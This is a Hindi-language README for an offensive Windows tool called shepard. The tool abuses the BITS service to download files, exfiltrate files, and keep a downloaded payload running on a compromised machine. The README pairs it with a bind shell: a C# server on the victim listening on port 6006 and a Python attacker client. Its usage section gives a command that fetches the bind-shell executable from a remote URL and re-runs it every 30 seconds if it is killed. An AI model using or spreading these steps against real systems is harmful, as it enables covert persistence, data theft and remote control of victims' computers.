
Windows BITS का उपयोग करके प्रगति पर स्थायी डाउनलोड/अपलोड/निष्पादन उपकरण।
यह एक स्थायित्व उपकरण है जो Windows Background Intelligent Transfer Service (BITS) का उपयोग करता है।
फ़ाइल डाउनलोड, फ़ाइल एक्सफ़िल्ट्रेशन, फ़ाइल डाउनलोड + स्थायी निष्पादन
shepard.exe को व्यवस्थापक के रूप में निम्नलिखित कमांड लाइन तर्कों के साथ चलाएँ:
-d <remoteLocation> <writePath> : आपकी पसंद के स्थानीय पथ पर नियमित फ़ाइल डाउनलोड
-e <remoteLocation> <localPath> : आपकी पसंद के स्थानीय पथ से नियमित फ़ाइल अपलोड (केवल IIS सर्वर पर भेजता है, यह BITS की एक सीमा है)
-dr <remoteLocation> <writePath> [optionalFileArgs] : आपकी पसंद के पथ पर फ़ाइल डाउनलोड करेगा, और स्थायित्व बनाए रखने का प्रयास करेगा। डाउनलोड की गई फ़ाइल optionalFileArgs के साथ चलने का प्रयास करेगी और BITS हर 30 सेकंड में जाँच करेगा कि फ़ाइल समझौता किए गए सिस्टम पर अभी भी चल रही है या नहीं।
इस निष्पादन योग्य को बिना किसी तर्क के या गलत संख्या में तर्कों के साथ चलाने पर shepard साफ-सफाई से बाहर निकल जाएगा।
सर्वर (पीड़ित) C# का उपयोग करके लिखा गया है। यह पोर्ट 6006 पर सुनता है।
shepardsbind_serv.exe को बिना किसी तर्क के चलाएँ।
क्लाइंट (हमलावर) Python का उपयोग करके लिखा गया है और यह एक तर्क लेता है: पीड़ित की मशीन का IP पता।
shepardsbind_recv.py <victim's IP>
shepardsbind_recv.py को बिना किसी तर्क के चलाने पर एक त्रुटि वापस आएगी।
एकमात्र निष्पादन योग्य जो पीड़ित की मशीन पर होना चाहिए, वह shepard.exe है। डाउनलोड bindshell निष्पादन योग्य को सार्वजनिक रूप से सुलभ स्थान पर होस्ट करें। Shepard bindshell निष्पादन योग्य को डाउनलोड और चलाएगा, और उपयोगकर्ता अब python रिसीवर का उपयोग कर सकता है। यदि शेल पाया जाता है और मार दिया जाता है, तो यह 30 सेकंड के बाद पुनः आरंभ होगा।
उदाहरण: shepard.exe -dr http://location.com/shepardsbind_serv.exe C:\Users\Administrator\file.exe